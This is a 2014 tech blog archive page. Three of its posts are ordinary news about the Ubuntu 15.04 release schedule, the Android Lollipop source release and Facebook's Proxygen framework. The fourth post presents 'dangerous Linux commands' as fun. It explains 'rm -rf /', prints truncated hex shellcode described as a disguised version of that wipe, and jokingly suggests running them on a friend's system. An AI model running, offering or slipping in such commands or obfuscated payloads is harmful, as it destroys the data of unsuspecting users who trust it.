Skip to main content

Posts

Showing posts from November, 2014

Ubuntu 15 release schedule

Ubuntu 15.04 which is codenamed Vivid Vervet has already gone in development. A tentative release schedule of Ubuntu 15.04 is out which says it will be released on 23 April 2015. Now this is again interesting. Windows 10 which has taken plenty of features from Linux, is supposed to be released around mid next year. I have a tentative feeling that it could be in April 2015. This is because Windows 8 was released one week after Ubuntu 12.10 while Windows 8.1 and Ubuntu 13.10 were released on the same date of 17 October 2013. Anyways, let’s have a look at Ubuntu 15.04 Release dates. Ubuntu 15.04 release schedule Alpha 1 – December 18th  Alpha 2 – January 22nd  Feature Freeze – February 19th  Beta 1 – February 28th  UI Freeze – March 12th  Final Beta – March 26th  Kernel Freeze – April 9th  Release Candidate – April 16th  Final Release – April 23rd That concludes Ubuntu 15.04 release dates. Stay tuned for more updates on Ubuntu 15.04. Sources: ITFOSS

Google Unveils Android Lollipop Source Code

Android 5 Source -Code Revealed Google has now officially completed the launch of the latest Android version by releasing the source code in Android Open Source Project (ASOP). The IT giant has unveiled all Android 5.0 code at its official Git webpage, ( Check here ), and source codes are now absolute ready for the manufacturers and custom ROM developers.   Android 5.0, Android 5.0 source code, Android 5.0 Lollipop, Google, Google Android 5.0 Lollipop release, Android, Android version release  Google has made the Android 5.0 code available as a part of android/platform build/lollipop-release branch with the build number of “LRX21M”. It has also added the device repositories for the new Nexus devices including Nexus Player, Nexus 6 and Nexus 9.  Along with that, the Android team has also shared a new documentation for Lollipop release, which would assist the developers about how to go with it. The Android Building Google Group post regarding the same can be viewed here .

Superb Linux Commands To do Fun With.

Dangerous Linux Commands To Play :) Don't ever Run These Commands on Your Linux Desktop...... Ahh  well you can Try on Your Friends Linux Destro :) 1. rm -rf / Deletes everything including files on your hard drive and files on connected removable media devices. rm – Remove the following files. -rf – Run rm recursively and force-remove all files without prompting you. / – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices,  including remote file shares and removable drives. 2. Disguised rm –rf / Actually, the hex version of rm –rf / – wipes out your files just as if you had run rm –rf /. char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\

Facebook Open Sources Its Proxygen HTTP Framework And Server

Facebook Open Sources Its Proxygen HTTP Framework And Server Looks like Facebook is still continuing Open-Sourcing some of its internal Usage Codes lets get an deeper image of it. The earlier day Facebook that it is Open Sourcing its Proxygen & HTTP framework And Server.As earlier it has already Open sourced many of its Current using Technologies and now Open Sourcing these which gives an keen interest for Web-Application & Mobile Developers. Well Speaking of Proxygen its: A collection of C++ HTTP libraries including an easy to use HTTP server. You Can get the Source code of Proxygen from here .